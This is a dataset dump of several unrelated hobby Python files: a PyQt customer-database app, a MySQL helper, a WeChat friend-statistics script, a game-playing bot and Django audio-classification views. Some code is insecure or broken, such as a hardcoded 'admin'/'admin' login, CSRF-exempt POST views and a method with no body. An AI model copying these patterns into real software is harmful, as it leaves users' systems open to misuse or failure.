QLabel(\"Address\")\n self.mobLabel = QLabel(\"Mobile\")\n self.ageLabel = QLabel(\"Age\")\n self.storeidLabel = QLabel(\"Storeid\")\n self.genderLabel=QLabel(\"Gender\")\n\n #QLineEdit items for variables that must be typed\n self.cidText=QLineEdit(self)\n self.nameText=QLineEdit(self)\n self.addressText = QLineEdit(self)\n self.ageText=QLineEdit(self)\n self.mobText = QLineEdit(self)\n\n #initializing a QGridLayout and adding labels,items in x,y format\n self.grid=QGridLayout(self)\n self.grid.addWidget(self.cidLabel,1,1)\n self.grid.addWidget(self.nameLabel,2,1)\n self.grid.addWidget(self.genderLabel, 3, 1)\n self.grid.addWidget(self.addressLabel, 4, 1)\n self.grid.addWidget(self.ageLabel, 5, 1)\n self.grid.addWidget(self.storeidLabel, 6, 1)\n self.grid.addWidget(self.mobLabel,7,1)\n\n self.grid.addWidget(self.cidText,1,2)\n self.grid.addWidget(self.nameText,2,2)\n self.grid.addWidget(self.genderCombo, 3, 2)\n self.grid.addWidget(self.addressText, 4, 2)\n self.grid.addWidget(self.ageText,5,2)\n self.grid.addWidget(self.storeidCombo, 6, 2)\n self.grid.addWidget(self.mobText, 7, 2)\n\n #adding three buttons into grid\n self.grid.addWidget(self.btnReset,9,1)\n self.grid.addWidget(self.btnAdd,9,2)\n self.grid.addWidget(self.btnCancel,9,3)\n\n #button connectors where Add calls of addCustomer(), Cancel quits the instance, Reset calls of reset()\n self.btnAdd.clicked.connect(self.addCustomer)\n self.btnCancel.clicked.connect(QApplication.instance().quit)\n self.btnReset.clicked.connect(self.reset)\n\n #initializing the window and adding the grid\n self.setLayout(self.grid)\n self.setWindowTitle(\"Add Customer Details\")\n self.resize(500,300)\n self.show()\n sys.exit(self.exec())\n\n #reset method which resets the text field values\n def reset(self):\n self.cidText.setText(\"\")\n self.nameText.setText(\"\")\n self.addressText.setText(\"\")\n self.ageText.setText(\"\")\n self.mobText.setText(\"\")\n\n #addCustomer method which takes the values entered/selected and passes them to the DBHelper class to run the database query\n def addCustomer(self):\n self.gender=self.genderCombo.currentIndex()\n self.storeid=self.storeidCombo.currentIndex()\n self.cid=int(self.cidText.text())\n self.name=self.nameText.text()\n self.age=int(self.ageText.text())\n self.address=self.addressText.text()\n self.mobile=int(self.mobText.text())\n #passes fields to DBHelper\n self.dbhelper=DBHelper()\n self.dbhelper.addCustomer(self.cid,self.name,self.gender,self.storeid,self.age,self.address,self.mobile)\n\n#creating a class which inherits QDialog to create the entry form of adding a new transaction to the database\nclass AddTransaction(QDialog):\n def __init__(self):\n super().__init__()\n\n #general attributes\n self.reciept_no=-1\n self.cid=-1\n self.fee=-1\n self.storeid=-1\n self.reciept_date=-1\n self.payment_type=-1\n self.eid=-1\n\n #initializing cancel,add,reset buttons\n self.btnCancel=QPushButton(\"Cancel\",self)\n self.btnReset=QPushButton(\"Reset\",self)\n self.btnAdd=QPushButton(\"Add\",self)\n self.btnCancel.setFixedHeight(30)\n self.btnReset.setFixedHeight(30)\n self.btnAdd.setFixedHeight(30)\n\n #creating QComboBox items for dropdown selection of categorical variables\n self.storeidCombo = QComboBox(self)\n self.storeidCombo.addItem(\"Store 0\")\n self.storeidCombo.addItem(\"Store 1\")\n self.storeidCombo.addItem(\"Store 2\")\n self.storeidCombo.addItem(\"Store 3\")\n self.storeidCombo.addItem(\"Store 4\")\n self.storeidCombo.addItem(\"Store 5\")\n\n self.paymenttypeCombo = QComboBox(self)\n self.paymenttypeCombo.addItem(\"Cash\")\n self.paymenttypeCombo.addItem(\"Debit\")\n self.paymenttypeCombo.addItem(\"Credit\")\n\n #creating QLabel items for variables\n self.cidLabel=QLabel(\"Cid No\")\n self.feeLabel=QLabel(\"Total Fee\")\n self.storeidLabel = QLabel(\"Store id\")\n self.paymenttypeLabel = QLabel(\"Payment type\")\n self.eidLabel = QLabel(\"Employee id\")\n\n #creating QLineEdit items for values that need to be typed by the user\n self.cidText=QLineEdit(self)\n self.feeText=QLineEdit(self)\n self.eidText=QLineEdit(self)\n\n #creating a grid and adding the labels,widgets in x,y format\n self.grid=QGridLayout(self)\n self.grid.addWidget(self.cidLabel,1,1)\n self.grid.addWidget(self.feeLabel,2,1)\n self.grid.addWidget(self.storeidLabel, 3, 1)\n self.grid.addWidget(self.paymenttypeLabel, 4, 1)\n self.grid.addWidget(self.eidLabel, 5, 1)\n\n self.grid.addWidget(self.cidText,1,2)\n self.grid.addWidget(self.feeText,2,2)\n self.grid.addWidget(self.storeidCombo, 3, 2)\n self.grid.addWidget(self.paymenttypeCombo, 4, 2)\n self.grid.addWidget(self.eidText, 5, 2)\n\n #adding three buttons in grid form\n self.grid.addWidget(self.btnReset,6,1)\n self.grid.addWidget(self.btnAdd,6,2)\n self.grid.addWidget(self.btnCancel,6,3)\n\n #button connections for Add which calls on addTransaction(), Cancel which quits the instance, Reset which calls on reset()\n self.btnAdd.clicked.connect(self.addTransaction)\n self.btnCancel.clicked.connect(QApplication.instance().quit)\n self.btnReset.clicked.connect(self.reset)\n\n #setting the window layout and adding the grid\n self.setLayout(self.grid)\n self.setWindowTitle(\"Add Transaction Details\")\n self.resize(400,200)\n self.show()\n sys.exit(self.exec())\n\n #reset method that resets the text fields\n def reset(self):\n self.cidText.setText(\"\")\n self.feeText.setText(\"\")\n self.eidText.setText(\"\")\n\n #addTransaction method which takes the field values and passes them to the DBHelper class to run the database query\n def addTransaction(self):\n self.storeid=self.storeidCombo.currentIndex()\n self.paymenttype=self.paymenttypeCombo.currentIndex()\n self.cid=int(self.cidText.text())\n self.fee=int(self.feeText.text())\n self.eid=int(self.eidText.text())\n\n #passes fields to DBHelper class\n self.dbhelper=DBHelper()\n self.dbhelper.addTransaction(self.cid,self.fee,self.storeid,self.paymenttype,self.eid)\n\n\n#creating a main Window class with inheritance QMainWindow that holds the buttons for Enter Customer Details, Enter Payment Details, Show Customer Details, Show Transaction Details\nclass Window(QMainWindow):\n def __init__(self):\n super().__init__()\n\n #intializing QDialog prompt for case where search for Show Customer Details is selected\n self.cidToBeSearched=0\n #initializing box layout and creating label, entry field and Seach button\n self.vbox = QVBoxLayout()\n self.text = QLabel(\"Enter the cid no of the customer\")\n self.editField = QLineEdit()\n self.btnSearch = QPushButton(\"Search\", self)\n #calls on showCustomer method when clicked\n self.btnSearch.clicked.connect(self.showCustomer)\n #adding widgets to box layout\n self.vbox.addWidget(self.text)\n self.vbox.addWidget(self.editField)\n self.vbox.addWidget(self.btnSearch)\n #creating dialog and adding box layout\n self.dialog = QDialog()\n self.dialog.setWindowTitle(\"Enter cid No\")\n self.dialog.setLayout(self.vbox)\n\n #intializing QDialog prompt for case where search for Show Transaction Details is selected\n self.cidForTransaction = 0\n #initializing box layout and creating label, entry field and Seach button\n self.vboxTransaction = QVBoxLayout()\n self.textTransaction = QLabel(\"Enter the cid no of the customer\")\n self.editFieldTransaction = QLineEdit()\n self.btnSearchTransaction = QPushButton(\"Search\", self)\n #calls on showCustomerTransaction method when clicked\n self.btnSearchTransaction.clicked.connect(self.showCustomerTransaction)\n #adding widgets to box layout\n self.vboxTransaction.addWidget(self.textTransaction)\n self.vboxTransaction.addWidget(self.editFieldTransaction)\n self.vboxTransaction.addWidget(self.btnSearchTransaction)\n #creating dialog and adding box layout\n self.dialogTransaction = QDialog()\n self.dialogTransaction.setWindowTitle(\"Enter Cid No\")\n self.dialogTransaction.setLayout(self.vboxTransaction)\n\n #creating the 4 buttons on the main window\n self.btnEnterCustomer=QPushButton(\"Enter Customer Details\", self)\n self.btnEnterTransaction=QPushButton(\"Enter Transaction Details\",self)\n self.btnShowCustomerDetails=QPushButton(\"Show Customer Details\",self)\n self.btnShowTransactionDetails=QPushButton(\"Show Transaction Details\",self)\n\n #adding image\n self.image=QLabel(self)\n self.image.resize(150,150)\n self.image.move(120,20)\n self.image.setScaledContents(True)\n self.image.setPixmap(QtGui.QPixmap(\"icon.png\"))\n\n #placing buttons and mapping to their respective methods\n self.btnEnterCustomer.move(15,170)\n self.btnEnterCustomer.resize(180,40)\n self.btnEnterCustomerFont=self.btnEnterCustomer.font()\n self.btnEnterCustomerFont.setPointSize(13)\n self.btnEnterCustomer.setFont(self.btnEnterCustomerFont)\n self.btnEnterCustomer.clicked.connect(self.entercustomer)\n\n self.btnEnterTransaction.move(205,170)\n self.btnEnterTransaction.resize(180, 40)\n self.btnEnterTransaction.setFont(self.btnEnterCustomerFont)\n self.btnEnterTransaction.clicked.connect(self.entertransaction)\n\n self.btnShowCustomerDetails.move(15, 220)\n self.btnShowCustomerDetails.resize(180, 40)\n self.btnShowCustomerDetails.setFont(self.btnEnterCustomerFont)\n self.btnShowCustomerDetails.clicked.connect(self.showCustomerDialog)\n\n self.btnShowTransactionDetails.move(205, 220)\n self.btnShowTransactionDetails.resize(180, 40)\n self.btnShowTransactionDetails.setFont(self.btnEnterCustomerFont)\n self.btnShowTransactionDetails.clicked.connect(self.showCustomerTransactionDialog)\n\n #resizing and setting window title\n self.resize(400,280)\n self.setWindowTitle(\"Customer Database Management System\")\n\n #entercustomer method which call on the AddCustomer function\n def entercustomer(self):\n enterCustomer=AddCustomer()\n\n #entertransaction method which calls on the AddTransaction function\n def entertransaction(self):\n enterTransaction=AddTransaction()\n\n #showCustomerDialog method which executes QDialog prompt for case where Show Customer Details is selected\n def showCustomerDialog(self):\n self.dialog.exec()\n\n #showCustomerTransactionDialog method which executes QDialog prompt for case where Show Transaction Details is selected\n def showCustomerTransactionDialog(self):\n self.dialogTransaction.exec()\n\n #showCustomer method that takes editField entry and passes to DBHelper class to run query\n def showCustomer(self):\n if self.editField.text() is \"\":\n QMessageBox.warning(QMessageBox(), 'Error',\n 'You must give the cid number to show the results for.')\n return None\n showcustomer = DBHelper()\n #runs DBhelper class for searchCustomer\n showcustomer.searchCustomer(int(self.editField.text()))\n\n #showCustomerTransaction method that takes editField entry and passes to DBHelper class to run query\n def showCustomerTransaction(self):\n if self.editFieldTransaction.text() is \"\":\n QMessageBox.warning(QMessageBox(), 'Error',\n 'You must give the cid number to show the results for.')\n return None\n showcustomer = DBHelper()\n #runs DBhelper class for searchTransaction\n showcustomer.searchTransaction(int(self.editFieldTransaction.text()))\n\n#creating a Login window class with inheritance QDialog\nclass Login(QDialog):\n def __init__(self, parent=None):\n super(Login, self).__init__(parent)\n #label and QLineEdit fields for username and password\n self.userNameLabel=QLabel(\"Username\")\n self.userPassLabel=QLabel(\"Password\")\n self.textName = QLineEdit(self)\n self.textPass = QLineEdit(self)\n #Login button which calls upon handleLogin when clicked\n self.buttonLogin = QPushButton('Login', self)\n self.buttonLogin.clicked.connect(self.handleLogin)\n #adding widget items to QGridLayout layout dialog in x,y format\n layout = QGridLayout(self)\n layout.addWidget(self.userNameLabel, 1, 1)\n layout.addWidget(self.userPassLabel, 2, 1)\n layout.addWidget(self.textName,1,2)\n layout.addWidget(self.textPass,2,2)\n layout.addWidget(self.buttonLogin,3,1,1,2)\n self.setWindowTitle(\"Login\")\n\n #handleLogin method that verifies entered login details\n def handleLogin(self):\n if (self.textName.text() == 'admin' and\n self.textPass.text() == 'admin'):\n self.accept()\n else:\n QMessageBox.warning(\n self, 'Error', 'Bad user or password')\n\n#main function which executes the login dialog first\n#main window is opened upon a succesful login\nif __name__ == '__main__':\n app = QApplication(sys.argv)\n login = Login()\n\n if login.exec_() == QDialog.Accepted:\n window = Window()\n window.show()\n\n sys.exit(app.exec_())\n","repo_name":"tniaz/Customer-Database-Management-System","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":22709,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"4767235346","text":"\"\"\"\nModule: logbase.py\nAuthor: Chris Lawton, DLS Solutions, Inc.\nDescription: Contains the PortSettings class\n\"\"\"\n\nclass PortSettings:\n \"\"\"\n Provides common serial port settings and defaults.\n \"\"\"\n baud = 115200\n parity = \"N\"\n dataBits = 8\n stopBits = 1\n ","repo_name":"habibiam/opto_luna","sub_path":"LunaSrv/port_settings.py","file_name":"port_settings.py","file_ext":"py","file_size_in_byte":280,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"6514823349","text":"from mysql import connector\r\nfrom NewApi.common.read_config import ReadConfig\r\nfrom NewApi.common import project_path\r\n\r\nclass DoMysql:\r\n '''操作数据库的类,专门进行数据的读取'''\r\n\r\n def do_mysql(self,query,flag=1):\r\n '''\r\n query sql查询语句\r\n flag 标志 1 获取一条数据 2获取多条数据'''\r\n db_config = ReadConfig(project_path.conf_path).get_data('DB', 'db_config')\r\n\r\n cnn = connector.connect(**db_config)\r\n cursor = cnn.cursor()\r\n cursor.execute(query)\r\n\r\n if flag == 1:\r\n res = cursor.fetchone()\r\n else:\r\n res = cursor.fetchall()\r\n\r\n return res\r\n\r\n\r\nif __name__ == '__main__':\r\n query = 'SELECT * FROM load WHERE Id<23528' # '\r\n res = DoMysql().do_mysql(query, 2)\r\n print('数据库的查询结果1:{}'.format(res))","repo_name":"acycy/test_demo","sub_path":"pyClass/NewApi/common/do_mysql.py","file_name":"do_mysql.py","file_ext":"py","file_size_in_byte":859,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"1455495561","text":"import os, sys\nfrom PySide import QtGui, QtCore\n\nfrom variables import *\nclass liqueModeler(QtGui.QWidget):\n\tdef __init__(self):\n\t\tsuper(liqueModeler, self).__init__()\n\t\tself.setWindowTitle('LiqueModeler')\n\t\tself.resize(300,300)\n\n\t\tself.s_l_textbox = QtGui.QLineEdit(self)\n\t\tself.s_l_textbox.setEnabled(False)\n\n\t\tself.s_l_writebox = QtGui.QLineEdit(self)\n\n\t\tself.s_w_textbox = QtGui.QLineEdit(self)\n\n\t\tself.createButton = QtGui.QPushButton('PAPER THAT')\n\n\t\thbox = QtGui.QHBoxLayout()\n\n\t\thbox.addWidget(self.s_l_textbox)\n\t\thbox.addWidget(self.s_l_writebox)\n\t\tself.setLayout(hbox)\n\n\t\t# main widget\n\n\t\tvbox = QtGui.QVBoxLayout()\n\n\t\tvbox.addWidget(hbox)\n\t\tvbox.addWidget(self.s_w_textbox)\n\t\tvbox.addWidget(self.createButton)\n\n\t\tself.setLayout(vbox)\n\napp = QtGui.QApplication.instance()\nif app is None:\n\tapp = QtGui.QApplication(sys.argv)\nlM = liqueModeler()\nlM.show()\n","repo_name":"ChienLoutre/LiqueTools","sub_path":"utils/modeling/liquemodeler.py","file_name":"liquemodeler.py","file_ext":"py","file_size_in_byte":864,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"5"} +{"seq_id":"24877546139","text":"# 统计微信好友男女比例\n# coding=utf8\n\nimport itchat\nimport numpy as ny\nimport matplotlib.mlab as mlab\nimport matplotlib.pyplot as plt\n\n\nitchat.login()\n# 获取好友列表\nfriends = itchat.get_friends(update=True)\n\n# 初始化计数器,有男有女,也有未填写性别的\nmale = female = other = 0\n\nprint(\"自己的用户是好友列表第一个\")\nprint(friends[0])\n\nfor i in friends[1:]:\n # 1为男,2为女\n sex = i[\"Sex\"]\n if sex == 1:\n male += 1\n elif sex == 2:\n female += 1\n else:\n other += 1\n\n\n# 计算好友总数\ntotal = len(friends[1:])\n\n# 打印好友性别比例\nmale_persent = (float(male) / total * 100)\nfemale_persent = (float(female) / total * 100)\nother_persend = (float(other) / total * 100)\nprint(\"男性好友: %.2f%%\" % male_persent + \"\\n\"\n + \"女性好友: %.2f%%\" % female_persent + \"\\n\"\n + \"不明性别好友: %.2f%%\" % other_persend)\n\n# 根据数据做出百分比圆饼图\nlabels = ['男', '女', '未知']\nx = [male, female, other]\nfig = plt.figure()\n\n# 步骤一(替换sans-serif字体)\nplt.rcParams['font.sans-serif'] = ['SimHei']\n# 步骤二(解决坐标轴负数的负号显示问题),一般为步骤一引起\nplt.rcParams['axes.unicode_minus'] = False\n\nplt.pie(x, labels=labels, autopct='%1.2f%%')\nplt.title('圆饼图')\nplt.show()\nplt.savefig(\"PieChart.png\")\n","repo_name":"kamihati/itchat_robot","sub_path":"34.py","file_name":"34.py","file_ext":"py","file_size_in_byte":1365,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"5"} +{"seq_id":"34691720621","text":"import gamelib\nimport random\nimport math\nimport warnings\nfrom sys import maxsize\nimport json\n\n\n\"\"\"\nMost of the algo code you write will be in this file unless you create new\nmodules yourself. Start by modifying the 'on_turn' function.\n\nAdvanced strategy tips: \n\n - You can analyze action frames by modifying on_action_frame function\n\n - The GameState.map object can be manually manipulated to create hypothetical \n board states. Though, we recommended making a copy of the map to preserve \n the actual current map state.\n\"\"\"\n\nclass AlgoStrategy(gamelib.AlgoCore):\n def __init__(self):\n super().__init__()\n seed = random.randrange(maxsize)\n random.seed(seed)\n gamelib.debug_write('Random seed: {}'.format(seed))\n\n def on_game_start(self, config):\n \"\"\" \n Read in config and perform any initial setup here \n \"\"\"\n gamelib.debug_write('Configuring your custom algo strategy...')\n self.config = config\n global FILTER, ENCRYPTOR, DESTRUCTOR, PING, EMP, SCRAMBLER, BITS, CORES\n FILTER = config[\"unitInformation\"][0][\"shorthand\"]\n ENCRYPTOR = config[\"unitInformation\"][1][\"shorthand\"]\n DESTRUCTOR = config[\"unitInformation\"][2][\"shorthand\"]\n PING = config[\"unitInformation\"][3][\"shorthand\"]\n EMP = config[\"unitInformation\"][4][\"shorthand\"]\n SCRAMBLER = config[\"unitInformation\"][5][\"shorthand\"]\n BITS = 1\n CORES = 0\n # This is a good place to do initial setup\n self.scored_on_locations = []\n\n \n \n\n def on_turn(self, turn_state):\n \"\"\"\n This function is called every turn with the game state wrapper as\n an argument. The wrapper stores the state of the arena and has methods\n for querying its state, allocating your current resources as planned\n unit deployments, and transmitting your intended deployments to the\n game engine.\n \"\"\"\n game_state = gamelib.GameState(self.config, turn_state)\n gamelib.debug_write('Performing turn {} of your custom algo strategy'.format(game_state.turn_number))\n game_state.suppress_warnings(True) #Comment or remove this line to enable warnings.\n\n self.starter_strategy(game_state)\n\n game_state.submit_turn()\n\n\n \"\"\"\n NOTE: All the methods after this point are part of the sample starter-algo\n strategy and can safely be replaced for your custom algo.\n \"\"\"\n\t \n def starter_strategy(self, game_state):\n game_state.attempt_spawn(ENCRYPTOR,[9, 9],1)\n game_state.attempt_spawn(ENCRYPTOR,[18, 9],1)\n game_state.attempt_spawn(EMP, [6, 7], 1)\n game_state.attempt_spawn(EMP, [21, 7], 1)\n game_state.attempt_spawn(SCRAMBLER, [9, 4], 1)\n game_state.attempt_spawn(PING, [20, 6], 1)\n \"\"\"\n For defense we will use a spread out layout and some Scramblers early on.\n We will place destructors near locations the opponent managed to score on.\n For offense we will use long range EMPs if they place stationary units near the enemy's front.\n If there are no stationary units to attack in the front, we will send Pings to try and score quickly.\n \"\"\"\n # First, place basic defenses\n self.build_defences(game_state)\n # Now build reactive defenses based on where the enemy scored\n self.build_reactive_defense(game_state)\n\n # If the turn is less than 5, stall with Scramblers and wait to see enemy's base\n if game_state.turn_number < 5:\n self.stall_with_scramblers(game_state)\n else:\n # Now let's analyze the enemy base to see where their defenses are concentrated.\n # If they have many units in the front we can build a line for our EMPs to attack them at long range.\n if self.detect_enemy_unit(game_state, unit_type=None, valid_x=None, valid_y=[14, 15]) > 10:\n self.emp_line_strategy(game_state)\n else:\n # They don't have many units in the front so lets figure out their least defended area and send Pings there.\n\n # Only spawn Ping's every other turn\n # Sending more at once is better since attacks can only hit a single ping at a time\n if game_state.turn_number % 2 == 1:\n # To simplify we will just check sending them from back left and right\n ping_spawn_location_options = [[8, 5], [19, 5]]\n best_location = self.least_damage_spawn_location(game_state, ping_spawn_location_options)\n game_state.attempt_spawn(PING, best_location, 1000)\n\n # Lastly, if we have spare cores, let's build some Encryptors to boost our Pings' health.\n encryptor_locations = [[10, 7], [17, 7],[8, 9], [10, 9], [17, 9], [19, 9], [10, 7], [17, 7]]\n game_state.attempt_spawn(ENCRYPTOR, encryptor_locations)\n game_state.attempt_upgrade(encryptor_locations)\n\n\n def build_defences(self, game_state):\n \"\"\"\n Build basic defenses using hardcoded locations.\n Remember to defend corners and avoid placing units in the front where enemy EMPs can attack them.\n \"\"\"\n # Useful tool for setting up your base locations: https://www.kevinbai.design/terminal-map-maker\n # More community tools available at: https://terminal.c1games.com/rules#Download\n\n # Place destructors that attack enemy units\n destructor_locations = [[3, 12], [26, 12], [17, 12], [11, 12],[1, 12], [25, 12], [2, 12], [2, 11], [24, 12], [4, 11], [25, 11], [3, 11], [23, 11], [17, 12], [13, 12], [11, 12], [2, 11], [3, 10], [12, 12], [19, 12], [24, 11], [25, 11]]\n # attempt_spawn will try to spawn units if we have resources, and will check if a blocking unit is already there\n game_state.attempt_spawn(DESTRUCTOR, destructor_locations)\n \n # Place filters in front of destructors to soak up damage for them\n filter_locations = [[0, 13], [27, 13], [1, 13], [26,13], [2,13], [25,13],[4, 13], [24, 13]]\n game_state.attempt_spawn(FILTER, filter_locations)\n # upgrade filters so they soak more damage\n game_state.attempt_upgrade(destructor_locations)\n game_state.attempt_upgrade(filter_locations)\n \n\n def build_reactive_defense(self, game_state):\n \"\"\"\n This function builds reactive defenses based on where the enemy scored on us from.\n We can track where the opponent scored by looking at events in action frames \n as shown in the on_action_frame function\n \"\"\"\n for location in self.scored_on_locations:\n # Build destructor one space above so that it doesn't block our own edge spawn locations\n build_location = [location[0], location[1]+2]\n game_state.attempt_spawn(DESTRUCTOR, build_location)\n game_state.attempt_upgrade(build_location)\n\n def stall_with_scramblers(self, game_state):\n \"\"\"\n Send out Scramblers at random locations to defend our base from enemy moving units.\n \"\"\"\n # We can spawn moving units on our edges so a list of all our edge locations\n friendly_edges = game_state.game_map.get_edge_locations(game_state.game_map.BOTTOM_LEFT) + game_state.game_map.get_edge_locations(game_state.game_map.BOTTOM_RIGHT)\n \n # Remove locations that are blocked by our own firewalls \n # since we can't deploy units there.\n deploy_locations = self.filter_blocked_locations(friendly_edges, game_state)\n \n # While we have remaining bits to spend lets send out scramblers randomly.\n while game_state.get_resource(BITS) >= game_state.type_cost(SCRAMBLER)[BITS] and len(deploy_locations) > 0:\n # Choose a random deploy location.\n deploy_index = 7\n deploy_location = deploy_locations[deploy_index]\n \n game_state.attempt_spawn(SCRAMBLER, deploy_location)\n \"\"\"\n We don't have to remove the location since multiple information \n units can occupy the same space.\n \"\"\"\n\n def emp_line_strategy(self, game_state):\n \"\"\"\n Build a line of the cheapest stationary unit so our EMP's can attack from long range.\n \"\"\"\n # First let's figure out the cheapest unit\n # We could just check the game rules, but this demonstrates how to use the GameUnit class\n# stationary_units = [FILTER, DESTRUCTOR, ENCRYPTOR]\n# cheapest_unit = FILTER\n# for unit in stationary_units:\n# unit_class = gamelib.GameUnit(unit, game_state.config)\n# if unit_class.cost[game_state.BITS] < gamelib.GameUnit(cheapest_unit, #game_state.config).cost[game_state.BITS]:\n# cheapest_unit = unit\n\n # Now let's build out a line of stationary units. This will prevent our EMPs from running into the enemy base.\n # Instead they will stay at the perfect distance to attack the front two rows of the enemy base.\n# for x in range(27, 5, -1):\n# game_state.attempt_spawn(cheapest_unit, [x, 11])\n\n # Now spawn EMPs next to the line\n # By asking attempt_spawn to spawn 1000 units, it will essentially spawn as many as we have resources for\n# game_state.attempt_spawn(EMP, [24, 10], 1000)\n\n def least_damage_spawn_location(self, game_state, location_options):\n \"\"\"\n This function will help us guess which location is the safest to spawn moving units from.\n It gets the path the unit will take then checks locations on that path to \n estimate the path's damage risk.\n \"\"\"\n damages = []\n # Get the damage estimate each path will take\n for location in location_options:\n path = game_state.find_path_to_edge(location)\n damage = 0\n for path_location in path:\n # Get number of enemy destructors that can attack the final location and multiply by destructor damage\n damage += len(game_state.get_attackers(path_location, 0)) * gamelib.GameUnit(DESTRUCTOR, game_state.config).damage_i\n damages.append(damage)\n \n # Now just return the location that takes the least damage\n return location_options[damages.index(min(damages))]\n\n def detect_enemy_unit(self, game_state, unit_type=None, valid_x = None, valid_y = None):\n total_units = 0\n for location in game_state.game_map:\n if game_state.contains_stationary_unit(location):\n for unit in game_state.game_map[location]:\n if unit.player_index == 1 and (unit_type is None or unit.unit_type == unit_type) and (valid_x is None or location[0] in valid_x) and (valid_y is None or location[1] in valid_y):\n total_units += 1\n return total_units\n \n def filter_blocked_locations(self, locations, game_state):\n filtered = []\n for location in locations:\n if not game_state.contains_stationary_unit(location):\n filtered.append(location)\n return filtered\n\n def on_action_frame(self, turn_string):\n \"\"\"\n This is the action frame of the game. This function could be called \n hundreds of times per turn and could slow the algo down so avoid putting slow code here.\n Processing the action frames is complicated so we only suggest it if you have time and experience.\n Full doc on format of a game frame at: https://docs.c1games.com/json-docs.html\n \"\"\"\n # Let's record at what position we get scored on\n state = json.loads(turn_string)\n events = state[\"events\"]\n breaches = events[\"breach\"]\n for breach in breaches:\n location = breach[0]\n unit_owner_self = True if breach[4] == 1 else False\n # When parsing the frame data directly, \n # 1 is integer for yourself, 2 is opponent (StarterKit code uses 0, 1 as player_index instead)\n if not unit_owner_self:\n gamelib.debug_write(\"Got scored on at: {}\".format(location))\n self.scored_on_locations.append(location)\n gamelib.debug_write(\"All locations: {}\".format(self.scored_on_locations))\n\n\nif __name__ == \"__main__\":\n algo = AlgoStrategy()\n algo.start()\n","repo_name":"Evansun0622/Ternimal-Live-AI-Coding-Competition","sub_path":"algo_strategy.py","file_name":"algo_strategy.py","file_ext":"py","file_size_in_byte":12376,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"5"} +{"seq_id":"5727783243","text":"from django.http import Http404, JsonResponse\nfrom django.shortcuts import render\nfrom chatbot.chatbot import create_chatbot\nimport threading\nimport pickle\nimport collections\nfrom io import BytesIO\nimport numpy as np\nimport urllib.request\nimport json\nimport wave\nimport librosa\nimport pandas as pd\nfrom homepage.models import Memory, Person, Raw_Conversation\nfrom django.views.decorators.csrf import csrf_exempt\nfrom django.utils.decorators import method_decorator\nfrom sklearn.naive_bayes import GaussianNB\nfrom chatterbot.trainers import ListTrainer\nurl =\"https://samples.openweathermap.org/data/2.5/weather?q=Eberstadt,%20DE&appid=b6907d289e10d714a6e88b30761fae22\"\nimport sys\nnp.set_printoptions(threshold=sys.maxsize)\n\n#====Create cheatbot\nchatbot = create_chatbot()\n#====\ndef get_mfcc_feature(data):\n \"\"\"\n Converts a wave file into his mfcc features\n @args:\n data(binary):\n @return:\n mfcc_features(np.array)\n \"\"\"\n fs=44100\n x = librosa.util.fix_length(data, 45000)\n mfcc_features = librosa.feature.mfcc(y=x, sr=fs)\n\n return mfcc_features\n\n\ndef get_person(request,name_person):\n\n count = Person.objects.filter(first_name=name_person).count()\n if count==0:\n p1 = Person(first_name=name_person)\n p1.save()\n return JsonResponse({\"name_person\": \"unkown\"})\n\n else:\n return JsonResponse({\"name_person\": \"kown\"})\n\n\n@method_decorator(csrf_exempt, name='post')\ndef classify_audio(request):\n '#0.Step: Get data for classification'\n data = request.body\n '#1.Step: Check if shape is dividy by 2 zero'\n if len(data)%2==0:\n data_float_raw = librosa.util.buf_to_float(data)\n else:\n data_float_raw = librosa.util.buf_to_float(data[:-1])\n\n '2.Step: # Trim the beginning and ending silence'\n data_float, index = librosa.effects.trim(data_float_raw)\n '#0.1.Step: Get mfcc feature for data'\n prediction_mfcc = get_mfcc_feature_data(data_float)\n '#0.2.Step: Flatten mfcc '\n prediction_mfcc_fl = prediction_mfcc.flatten()\n '#1.Step: Load all data from dbase table Memory'\n df = pd.DataFrame(list(Memory.objects.all().values()))\n '#2.Step: Create train_label and train_data'\n train_data_list = []\n for i in range(0, len(df)):\n train_data_list.append(\n bytes_numpy(df.loc[i, \"blob_data_mfcc\"]).flatten()\n )\n train_data = np.array(train_data_list)\n\n train_label = df[\"ground_truth\"].values\n '#3.Step: Fit bayes classifier'\n clf = GaussianNB()\n clf.fit(train_data, train_label)\n '#4.Step: Make prediction'\n prediction = clf.predict([prediction_mfcc_fl])\n print(prediction)\n '# Make relative prediction'\n relative_predict = clf.predict_log_proba([prediction_mfcc_fl]) / clf.predict_log_proba([prediction_mfcc_fl]).sum()\n relative_predict_round_flat = np.around(relative_predict * 100, 4).flatten()\n\n '#Step: Combine the classes and the relative'\n result_dict = {}\n for el_cl, el_pre in zip(clf.classes_, relative_predict_round_flat):\n result_dict[el_cl] = el_pre\n\n '#Step:Sort the dict'\n d_sorted = dict(sorted(result_dict.items(), key=lambda kv: kv[1]))\n print(d_sorted)\n return JsonResponse({\"prediction\": d_sorted})\n\n\ndef home(request ):\n return render(request, 'home.html')\n\n@method_decorator(csrf_exempt, name='post')\ndef recorded_audio(request):\n data = request.body\n ground_truth = request.headers[\"Ground-Truth\"]\n '#1.Step: Check if shape is dividy by 2 zero'\n if len(data)%2==0:\n data_float = librosa.util.buf_to_float(data)\n else:\n data_float = librosa.util.buf_to_float(data[:-1])\n\n '#1.Step: Get the raw data'\n np_bytes = BytesIO()\n np.save(np_bytes, data_float, allow_pickle=True)\n np_bytes_raw = np_bytes.getvalue()\n '#2.Step: Get the mfcc features'\n mfcc = get_mfcc_feature_data(data_float)\n np_bytes = BytesIO()\n np.save(np_bytes, mfcc, allow_pickle=True)\n np_bytes_mfcc = np_bytes.getvalue()\n m1 = Memory(ground_truth=ground_truth,blob_data_raw=data,\n blob_data_float=np_bytes_raw, blob_data_mfcc=np_bytes_mfcc)\n m1.save()\n\n return JsonResponse({\"successfully\":\"Successfully saved to db\"})\n\ndef reco(request):\n return render(request, 'reco.html')\n\ndef audio(request):\n '#1.Step: Get all memoires for the table'\n all_memories = Memory.objects.all()\n\n all_memories_list = []\n for el in all_memories.values('ground_truth').distinct():\n key_word = 